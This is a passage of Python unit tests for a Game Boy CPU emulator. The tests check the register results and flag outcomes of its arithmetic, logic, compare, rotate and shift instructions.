self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_sub_reg16addrfromreg8(self):
"""Example from the Gameboy Programming Manual"""
addr16 = 0xc000
self.cpu.set_reg16('hl', addr16)
self.cpu.set_reg8('a', 0x3e)
self.cpu.mmu.set_addr(addr16, 0x40)
self.cpu.sub_reg16addrfromreg8('hl', 'a')()
self.assertEqual(self.cpu.get_reg8('a'), 0xfe)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_sub_reg16addrfromreg8_2(self):
# Make sure the zero flag gets set
addr16 = 0xc000
self.cpu.set_reg16('hl', addr16)
self.cpu.set_reg8('a', 0x3e)
self.cpu.mmu.set_addr(addr16, 0x3e)
self.cpu.sub_reg16addrfromreg8('hl', 'a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_sub_reg16addrfromreg8_3(self):
# Make sure the half-carry flag gets set
addr16 = 0xc000
self.cpu.set_reg16('hl', addr16)
self.cpu.set_reg8('a', 0x3e)
self.cpu.mmu.set_addr(addr16, 0x3f)
self.cpu.sub_reg16addrfromreg8('hl', 'a')()
self.assertEqual(self.cpu.get_reg8('a'), 0xff)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_sub_reg16addrfromreg8_4(self):
addr16 = 0xc000
self.cpu.set_reg16('hl', addr16)
self.cpu.set_reg8('a', 0x3e)
self.cpu.mmu.set_addr(addr16, 0x3e)
self.cpu.sub_reg16addrfromreg8('hl', 'a', carry=True)()
self.assertEqual(self.cpu.get_reg8('a'), 0xff)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_and_reg8(self):
self.cpu.set_reg8('a', 0xaa)
self.cpu.set_reg8('b', 0x55)
self.cpu.and_reg8('b')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_and_reg8_2(self):
self.cpu.set_reg8('a', 0xff)
self.cpu.set_reg8('l', 0x55)
self.cpu.and_reg8('l')()
self.assertEqual(self.cpu.get_reg8('a'), 0x55)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_and_imm8(self):
self.cpu.set_reg8('a', 0xaa)
self.cpu.mmu.rom = bytes([0x55])
self.cpu.and_imm8()()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_and_imm8_2(self):
self.cpu.set_reg8('a', 0xff)
self.cpu.mmu.rom = bytes([0x55])
self.cpu.and_imm8()()
self.assertEqual(self.cpu.get_reg8('a'), 0x55)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_and_reg16addr(self):
addr16 = 0xc000
self.cpu.set_reg8('a', 0xaa)
self.cpu.mmu.set_addr(addr16, 0x55)
self.cpu.set_reg16('bc', addr16)
self.cpu.and_reg16addr('bc')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_and_reg16addr_2(self):
# Make sure the zero flag is not set
addr16 = 0xc000
self.cpu.set_reg8('a', 0xa1)
self.cpu.mmu.set_addr(addr16, 0x55)
self.cpu.set_reg16('bc', addr16)
self.cpu.and_reg16addr('bc')()
self.assertEqual(self.cpu.get_reg8('a'), 0x1)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_or_reg8(self):
self.cpu.set_reg8('a', 0xaa)
self.cpu.set_reg8('b', 0x55)
self.cpu.or_reg8('b')()
self.assertEqual(self.cpu.get_reg8('a'), 0xff)
self.assertEqual(self.cpu.get_reg8('b'), 0x55)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
def test_or_reg8_2(self):
self.cpu.set_reg8('a', 0xff)
self.cpu.set_reg8('b', 0x55)
self.cpu.or_reg8('b')()
self.assertEqual(self.cpu.get_reg8('a'), 0xff)
self.assertEqual(self.cpu.get_reg8('b'), 0x55)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
def test_or_reg8_3(self):
self.cpu.set_reg8('a', 0x00)
self.cpu.set_reg8('b', 0x00)
self.cpu.or_reg8('b')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_or_imm8(self):
self.cpu.set_reg8('a', 0xaa)
self.cpu.mmu.rom = bytes([0x50])
self.cpu.or_imm8()()
self.assertEqual(self.cpu.get_reg8('a'), 0xfa)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
def test_or_imm8_2(self):
self.cpu.set_reg8('a', 0x00)
self.cpu.mmu.rom = bytes([0x00])
self.cpu.or_imm8()()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
def test_or_imm16addr(self):
self.cpu.mmu.rom = bytes([0x00, 0xc0])
self.cpu.set_reg8('a', 0xaa)
self.cpu.mmu.set_addr(0xc000, 0x55)
self.cpu.or_imm16addr()()
self.assertEqual(self.cpu.get_reg8('a'), 0xff)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
def test_or_imm16addr_2(self):
self.cpu.mmu.rom = bytes([0x00, 0xc0])
self.cpu.set_reg8('a', 0x00)
self.cpu.mmu.set_addr(0xc000, 0x00)
self.cpu.or_imm16addr()()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
def test_or_reg16addr(self):
addr16 = 0xc000
self.cpu.set_reg8('a', 0xaa)
self.cpu.mmu.set_addr(addr16, 0x55)
self.cpu.set_reg16('hl', addr16)
self.cpu.or_reg16addr('hl')()
self.assertEqual(self.cpu.get_reg8('a'), 0xff)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
def test_or_reg16addr_2(self):
addr16 = 0xc000
self.cpu.set_reg8('a', 0x00)
self.cpu.mmu.set_addr(addr16, 0x00)
self.cpu.set_reg16('hl', addr16)
self.cpu.or_reg16addr('hl')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
def test_xor_reg8(self):
self.cpu.set_reg8('a', 0xaa)
self.cpu.set_reg8('h', 0x55)
self.cpu.xor_reg8('h')()
self.assertEqual(self.cpu.get_reg8('a'), 0xff)
self.assertEqual(self.cpu.get_reg8('h'), 0x55)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_xor_reg8_2(self):
self.cpu.set_reg8('a', 0xaa)
self.cpu.set_reg8('b', 0xaa)
self.cpu.xor_reg8('b')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_reg8('b'), 0xaa)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_xor_imm8(self):
self.cpu.set_reg8('a', 0x55)
self.cpu.mmu.rom = bytes([0xaa])
self.cpu.xor_imm8()()
self.assertEqual(self.cpu.get_reg8('a'), 0xff)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_xor_imm8_2(self):
self.cpu.set_reg8('a', 0x55)
self.cpu.mmu.rom = bytes([0x55])
self.cpu.xor_imm8()()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_xor_reg16addr(self):
self.cpu.set_reg8('a', 0xaa)
self.cpu.mmu.set_addr(0xc000, 0x55)
self.cpu.set_reg16('hl', 0xc000)
self.cpu.xor_reg16addr('hl')()
self.assertEqual(self.cpu.get_reg8('a'), 0xff)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_xor_reg16addr_2(self):
self.cpu.set_reg8('a', 0xaa)
self.cpu.mmu.set_addr(0xc000, 0xaa)
self.cpu.set_reg16('hl', 0xc000)
self.cpu.xor_reg16addr('hl')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_cp_reg8toreg8(self):
self.cpu.set_reg8('b', 0x5d)
self.cpu.set_reg8('d', 0x4d)
self.cpu.cp_reg8toreg8('b', 'd')()
self.assertEqual(self.cpu.get_reg8('b'), 0x5d)
self.assertEqual(self.cpu.get_reg8('d'), 0x4d)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_cp_reg8toreg8_2(self):
"""Example from the Gameboy Programming Manual"""
self.cpu.set_reg8('a', 0x3c)
self.cpu.set_reg8('b', 0x2f)
self.cpu.cp_reg8toreg8('a', 'b')()
self.assertEqual(self.cpu.get_reg8('a'), 0x3c)
self.assertEqual(self.cpu.get_reg8('b'), 0x2f)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.cpu.cp_reg8toreg8('b', 'a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x3c)
self.assertEqual(self.cpu.get_reg8('b'), 0x2f)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_cp_reg8toreg8_3(self):
self.cpu.set_reg8('a', 0x3c)
self.cpu.set_reg8('b', 0x3c)
self.cpu.cp_reg8toreg8('a', 'b')()
self.assertEqual(self.cpu.get_reg8('a'), 0x3c)
self.assertEqual(self.cpu.get_reg8('b'), 0x3c)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_cp_regAtoregHLaddr(self):
"""Example from the Gameboy Programming Manual"""
addr16 = 0xc000
self.cpu.set_reg8('a', 0x3c)
self.cpu.mmu.set_addr(addr16, 0x40)
self.cpu.set_reg16('hl', addr16)
self.cpu.cp_regAtoregHLaddr()
self.assertEqual(self.cpu.get_reg8('a'), 0x3c)
self.assertEqual(self.cpu.mmu.get_addr(addr16), 0x40)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_cp_regAtoregHLaddr_2(self):
addr16 = 0xc000
self.cpu.set_reg8('a', 0x3c)
self.cpu.mmu.set_addr(addr16, 0x3c)
self.cpu.set_reg16('hl', addr16)
self.cpu.cp_regAtoregHLaddr()
self.assertEqual(self.cpu.get_reg8('a'), 0x3c)
self.assertEqual(self.cpu.mmu.get_addr(addr16), 0x3c)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_cp_regAtoregHLaddr_3(self):
addr16 = 0xc000
self.cpu.set_reg8('a', 0x3c)
self.cpu.mmu.set_addr(addr16, 0x2c)
self.cpu.set_reg16('hl', addr16)
self.cpu.cp_regAtoregHLaddr()
self.assertEqual(self.cpu.get_reg8('a'), 0x3c)
self.assertEqual(self.cpu.mmu.get_addr(addr16), 0x2c)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_cp_imm8toregA(self):
# When the immediate is the same as the contents of register A, the
# zero flag is set
self.cpu.set_reg8('a', 0xfe)
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0xfe])
self.cpu.cp_imm8toregA()
self.assertEqual(self.cpu.get_reg8('a'), 0xfe)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_cp_imm8toregA_2(self):
# When the immediate is greater than the contents of register A, the
# carry flag is set
self.cpu.set_reg8('a', 0xfe)
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0xff])
self.cpu.cp_imm8toregA()
self.assertEqual(self.cpu.get_reg8('a'), 0xfe)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_cp_imm8toregA_3(self):
# When the immediate is less than the contents of register A, the
# half-carry flag is set
self.cpu.set_reg8('a', 0xfe)
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0xfc])
self.cpu.cp_imm8toregA()
self.assertEqual(self.cpu.get_reg8('a'), 0xfe)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_rl_reg8_1(self):
"""Example from the Gameboy Programming Manual"""
self.cpu.set_reg8('a', 0x95)
self.cpu.set_carry_flag()
self.cpu.rl_reg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x2b)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_rl_reg8_2(self):
self.cpu.set_reg8('b', 0xa5)
self.cpu.reset_carry_flag()
self.cpu.rl_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x4a)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_rl_reg8_3(self):
self.cpu.set_reg8('b', 0xa5)
self.cpu.set_carry_flag()
self.cpu.rl_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x4b)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_rl_reg8_4(self):
# Make sure the zero flag is set
self.cpu.set_reg8('b', 0x00)
self.cpu.reset_carry_flag()
self.cpu.rl_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_rl_regHLaddr_1(self):
# Make sure zero and carry flags are set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x80)
self.cpu.reset_carry_flag()
self.cpu.rl_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_rl_regHLaddr_2(self):
# Make sure zero and carry flags are not set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x08)
self.cpu.set_carry_flag()
self.cpu.rl_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x11)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_rlc_reg8_1(self):
"""Example from the Gameboy Programming Manual
correction: result should be 0x0b, not 0x0a"""
self.cpu.set_reg8('a', 0x85)
self.cpu.reset_carry_flag()
self.cpu.rlc_reg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x0b)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_rlc_reg8_2(self):
self.cpu.set_reg8('b', 0xa5)
self.cpu.reset_carry_flag()
self.cpu.rlc_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x4b)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_rlc_reg8_3(self):
# Make sure the zero flag is set
self.cpu.set_reg8('b', 0x00)
self.cpu.set_zero_flag()
self.cpu.rlc_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 1)
def test_rlc_reg8_4(self):
# Make sure the carry flag is not set
self.cpu.set_reg8('b', 0x0a)
self.cpu.set_carry_flag()
self.cpu.rlc_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x14)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 0)
def test_rlc_regHLaddr_1(self):
# Make sure the zero flag is set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x00)
self.cpu.rlc_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_rlc_regHLaddr_2(self):
# Make sure the carry flag is set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x88)
self.cpu.rlc_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x11)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_rr_reg8_1(self):
"""Example from the Gameboy Programming Manual"""
self.cpu.set_reg8('a', 0x81)
self.cpu.reset_carry_flag()
self.cpu.rr_reg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x40)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_rr_reg8_2(self):
self.cpu.set_reg8('b', 0xa5)
self.cpu.reset_carry_flag()
self.cpu.rr_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x52)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_rr_reg8_3(self):
self.cpu.set_reg8('b', 0xa5)
self.cpu.set_carry_flag()
self.cpu.rr_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0xd2)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_rr_reg8_4(self):
# Make sure zero flag gets set
self.cpu.set_reg8('b', 0x01)
self.cpu.set_zero_flag()
self.cpu.reset_carry_flag()
self.cpu.rr_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 1)
def test_rr_reg8_5(self):
# Make sure carry flag does not get set
self.cpu.set_reg8('b', 0x10)
self.cpu.set_zero_flag()
self.cpu.reset_carry_flag()
self.cpu.rr_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x08)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 0)
def test_rr_regHLaddr_1(self):
# Make sure zero flag gets set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x01)
self.cpu.reset_carry_flag()
self.cpu.rr_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_rr_regHLaddr_2(self):
# Make sure carry flag does not get set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x10)
self.cpu.reset_carry_flag()
self.cpu.rr_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x08)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_rrc_reg8_1(self):
"""Example from the Gameboy Programming Manual"""
self.cpu.set_reg8('a', 0x3b)
self.cpu.reset_carry_flag()
self.cpu.rrc_reg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x9d)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_rrc_reg8_2(self):
self.cpu.set_reg8('b', 0xa5)
self.cpu.rrc_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0xd2)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_rrc_reg8_3(self):
# Make sure the zero flag gets set
self.cpu.set_reg8('b', 0x00)
self.cpu.set_carry_flag()
self.cpu.rrc_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_rrc_regHLaddr(self):
# Make sure the zero flag gets set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x00)
self.cpu.rrc_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_rrc_regHLaddr_2(self):
# Make sure the carry flag gets set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x01)
self.cpu.rrc_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x80)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_sla_reg8_1(self):
self.cpu.set_reg8('b', 0xa5)
self.cpu.sla_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x4a)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_sla_reg8_2(self):
self.cpu.set_reg8('b', 0x25)
self.cpu.sla_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x4a)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_sla_reg8_3(self):
# Make sure the zero flag gets set
self.cpu.set_reg8('b', 0x80)
self.cpu.sla_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 1)
def test_sla_regHLaddr_1(self):
addr = 0xc000
self.cpu.mmu.set_addr(addr, 0xa5)
self.cpu.set_reg16('hl', addr)
self.cpu.sla_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.get_reg16('hl')), 0x4a)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_sla_regHLaddr_2(self):
addr = 0xc000
self.cpu.mmu.set_addr(addr, 0x25)
self.cpu.set_reg16('hl', addr)
self.cpu.sla_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.get_reg16('hl')), 0x4a)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_sla_regHLaddr_3(self):
# Make sure the zero flag gets set
addr = 0xc000
self.cpu.mmu.set_addr(addr, 0x80)
self.cpu.set_reg16('hl', addr)
self.cpu.sla_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.get_reg16('hl')), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 1)
def test_sra_reg8_1(self):
self.cpu.set_reg8('b', 0xa5)
self.cpu.sra_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0xd2)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_sra_reg8_2(self):
self.cpu.set_reg8('b', 0xa4)
self.cpu.sra_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0xd2)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_sra_reg8_3(self):
# Make sure the zero flag gets set
self.cpu.set_reg8('b', 0x01)
self.cpu.sra_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 1)
def test_sra_addr16_1(self):
addr = 0xc000
self.cpu.mmu.set_addr(addr, 0xa5)
self.cpu.set_reg16('hl', addr)
self.cpu.sra_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.get_reg16('hl')), 0xd2)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_sra_addr16_2(self):
addr = 0xc000
self.cpu.mmu.set_addr(addr, 0xa4)
self.cpu.set_reg16('hl', addr)
self.cpu.sra_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.get_reg16('hl')), 0xd2)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_sra_addr16_3(self):
addr = 0xc000
self.cpu.mmu.set_addr(addr, 0x01)
self.cpu.set_reg16('hl', addr)
self.cpu.sra_regHLaddr()
self.assertEqual(self.cpu.mmu.get_addr(self.cpu.get_reg16('hl')), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 1)
def test_srl_reg8_1(self):
self.cpu.set_reg8('b', 0xa5)
self.cpu.srl_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x52)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_srl_reg8_2(self):
self.cpu.set_reg8('b', 0xa4)
self.cpu.srl_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x52)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_srl_reg8_3(self):
# Make sure the zero flag gets set
self.cpu.set_reg8('b', 0x01)
self.cpu.srl_reg8('b')()
